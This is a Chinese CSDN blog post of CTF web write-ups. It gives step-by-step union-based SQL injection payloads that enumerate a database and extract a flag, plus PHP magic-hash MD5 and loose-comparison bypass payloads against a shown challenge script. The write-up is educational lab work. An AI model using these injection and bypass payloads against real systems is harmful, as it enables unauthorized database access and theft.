ctfweb学习心得

最新推荐文章于 2023-01-11 01:38:05 发布
最新推荐文章于 2023-01-11 01:38:05 发布
阅读量1.6k 收藏 13
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wendyxiaan/article/details/127736460
版权

ctfshow_2020_web_02 WP
考查点:

    基本的SQL注入
    多表联合查询

在用户名处注入sql语句,密码随意
1.查当前数据库名称

 ' or 1=1 union select 1,database(),3 limit 1,2;#-- 

得到数据库名称web2
2.查看数据库表的数量

' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema = 'web2'),3 limit 1,2;#-- 

得到数据库表数量为2
3.查表的名字

第一个表:

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 0,1),3 limit 1,2;#-- 

得到表名:flag 
第二个表:

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 1,2),3 limit 1,2;#-- 

得到表名:user
4.查flag表列的数量

' or 1=1 union select 1,(select count(*) from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#-- 

只有1列
5.查flag表列的名字

' or 1=1 union select 1,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#-- 

列名为flag
6.查flag表记录的数量

' or 1=1 union select 1,(select count(*) from flag),3 limit 1,2;#-- 

只有一条记录
7.查flag表记录值

' or 1=1 union select 1,(select flag from flag limit 0,1),3 limit 1,2;#-- 

得到flag

ISCTF

EASY-PHP02

源码

<?php
highlight_file(__FILE__);
error_reporting(0);
$flag = "flag{need_time_to_change}";
include_once("config.php");
$YOUR_NAME = $_GET["NAME"];
$GET1 = $_POST["GET1"];
$GET2 = $_POST["GET2"];
$POST1 = $_GET["P0ST1"];
$POST2 = $_GET["P0ST2"];
if (isset($YOUR_NAME)){
    echo $YOUR_NAME.",请开始你的答题。"."<br>";
}
else{
    echo "做题前请告诉我你是小蓝鲨吗?";
    exit();
}
if (is_numeric($POST1)){
    if ($_GET["P0ST1"] != $_GET["P0ST2"]){
        
        if (($_GET["P0ST1"]) == md5($_GET["P0ST2"])){

                $f1=$flag1;
                echo "小蓝鲨成功一半".$f1;              
            }
    }
}

if(preg_match('/^[0-9]*$/',$GET1)) {
exit();
}
else{
    if( $GET1 == 0 ){
        echo "<br>"."前面的出来了吗?";
        if(is_numeric($GET2)){
            exit();
        }
        if($GET2 > 678){
            echo "答案就在眼前?"."<br>".$YOUR_NAME.",你觉得这是flag吗?"."<br>";     
            $Ag=base64_encode($flag2);
            }
    }
}
$flag666 = $f1.$Ag;
echo $flag666;
?>
做题前请告诉我你是小蓝鲨吗?
 

if (isset($YOUR_NAME)){
    echo $YOUR_NAME.",请开始你的答题。"."<br>";

第一个判断就是GET传个NAME就不细写了

if (is_numeric($POST1)){
    if ($_GET["P0ST1"] != $_GET["P0ST2"]){
       if (($_GET["P0ST1"]) == md5($_GET["P0ST2"])){

                $f1=$flag1;
                echo "小蓝鲨成功一半".$f1;              
            }
    }
}

这里要求$POST1为数字,P0ST1和P0ST2不相等,而且P0ST1等于P0ST2的md5值。

这里用到了PHP特性的知识,md5的比较。

原理:

在 php 中,当字符串 以0e开头时,会被 php 识别成科学计数法,会被认为是数字。

下面列出几个常用的MD5值以0e开头的字符串:

字符串    MD5值
QNKCDZO    0e830400451993494058024219903391
s878926199a    0e545993274517709034328855841020
s155964671a    0e342768416822451524974117254469
s214587387a    0e848240448830537924465865611904
s214587387a    0e848240448830537924465865611904
s878926199a    0e545993274517709034328855841020
s1091221200a    0e940624217856561557816327384675
Payload1:?NAME=11&P0ST1= 0e830400451993494058024219903391&P0ST2=QNKCDZO  

if(preg_match('/^[0-9]*$/',$GET1)) {
exit();
}
if( $GET1 == 0 ){
        echo "<br>"."前面的出来了吗?";
        if(is_numeric($GET2)){
            exit();
        }
        if($GET2 > 678){
            echo "答案就在眼前?"."<br>".$YOUR_NAME.",你觉得这是flag吗?"."<br>";     
            $Ag=base64_encode($flag2);
            }
    }

这里需要$GET1不能为数字,而且$GET1又等于0,并且$GET2不能为数字,值大于678。

原理:

php 的 0 与任何字符串比较都为 true,因为字符串被强制转换后都成了 0。

Payload2:GET1=qwe&GET2=679a
 

胡图图my
关注
  • 7
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf-web学习2
gofreshman的博客
12-01 188
后端php漏洞题目
CTF-Write-up:CTF撰写和信息
03-21
CTF比赛涵盖了密码学、web安全、逆向工程、取证分析等多个领域,对提升安全技能和团队协作能力有着显著作用。 CTF Write-up,即CTF比赛的解题报告,是参赛者在解决完挑战后,为了分享经验、帮助他人理解解题思路而...
[CTF] union select 联合查询,linux命令执行
V1040375575的博客
12-26 747
文章目录前言一、题目二、解题步骤1.使用bp抓包分析2.成功登陆后台 前言 CTF 学习记录:union select 联合查询,linux命令执行漏洞 一、题目 提  示: hint:union,命令执行 描  述: 命令执行 打开题目页面是一个login登陆 二、解题步骤 1.使用bp抓包分析 抓取登陆发送包: POST /login.php HTTP/1.1 Host: 1.1.1.1:10766 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
ctfshow刷题记录2(web crypto misc)
aarong的博客
12-19 449
简单记录一下自己做题的过程,方便以后进行复习 WEB、Crypto、MISC都涉及一些(入门级别,不是很难,希望得到师傅们的建议) 主要是多做题获得到解题的思路和经验 目录WEB1WEB2WEB3WEB4crypto2crypto3crypto4crypto5crypto6MISC2MISCx WEB1 F12查看网页信息 base64解码 WEB2 考察:SQL手工注入 必要知识点:在Mysql5.0以上版本中,Mysql存在一个自带数据库名为information_schema,它是一个存储记录所有
CTF show----web 解题笔记(web签到~web6)
weixin_45908624的博客
11-22 3765
web签到~web6 解题笔记
PHP反序列化漏洞之产生原因(题目练习)
qq_60463414的博客
08-13 3065
PHP反序列化漏洞之简单的题目练习
ctfshow web入门 序列化
Lumos427的博客
02-25 1381
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
DVWA全级别中文渗透教程和渗透环境,最强大没有之一
11-26
《DVWA全级别中文渗透教程和渗透环境》是针对Web安全领域的一款重要资源,它为初学者和有经验的安全研究人员提供了全面的学习平台。DVWA(Damn Vulnerable Web Application)是一套设计有各种常见Web应用程序安全...
CTF撰写
02-09
本主题“CTF撰写”着重关注的是如何编写有关CTF挑战的分析报告或解决方案,这通常涉及对解题思路、技术细节和学习心得的记录。 在CTF比赛的Web安全部分,PHP是经常出现的关键技术。PHP是一种广泛使用的服务器端脚本...
ctf-writeups:啊就writeups
02-14
总的来说,这个“ctf-writeups”资源对于CTF爱好者和网络安全学习者来说是一份宝贵的资料,它不仅记录了作者的成长历程,也为他人提供了学习和借鉴的机会。无论是对于个人技能的提升,还是团队合作的探索,这样的...
thegoonies.github.io:TheGooniesCTF博客
04-05
通过对这个压缩包的学习,你可以了解到CTF比赛中的常见问题、解决策略以及相关技术,同时也能了解一个静态博客的构建过程,包括前端开发、Web安全实践和逆向工程的运用。这对于提升网络安全技能和理解Web开发原理...
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 1607
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
php反序列化之字符逃逸
qq_53856457的博客
05-14 1619
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
PHP反序列化字符逃逸
m0re's blog
11-15 1064
前言 反序列化字符逃逸是最近很常见的题目,所以学习一下这个方面的知识,
ISCTF 2022 WEB WP分享
starttv的博客
11-04 1673
可以执行代码,进入这里首要要满足,num通过is_numeric的检测,并且不等于36,去空后依然不等于36,经过过滤方法后依然等于36。在进行===比较时,php会先判断两种字符串的类型是否相同,很显然两者都是字符串,第一个判断通过,再进行值的比较,两者是不相等的。2、=== :强等于。php 的 0 与任何字符串比较都为 true,这是不对的,但其实是正确的,因为字符串被强制转换后都成了 0。在进行==比较时,php会自动将字符串转为数字进行值的比较,在这里114512和114512s是相等的。
ctfshow web入门 SSRF(超详解)
qq_50589021的博客
09-08 6222
前言 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) https://ctf-wiki.org/web/ssrf/ https://www.freebuf.com/articles/web/260806.html web351 <?php error_reporting(0)
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3471
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5645
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
PHP代码审计8—SSRF 漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-02 1500
SSRF基础学习
ctf web方向怎么学习
最新发布
04-27
如果你想学习CTF Web方向,建议你掌握一些基本的技能,如Web开发和网络安全知识。可以从以下几个方面入手学习: 1. 学习Web开发:HTML、CSS、JavaScript、PHP、ASP.NET等等。 2. 学习网络知识:如HTTP协议、TCP/IP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值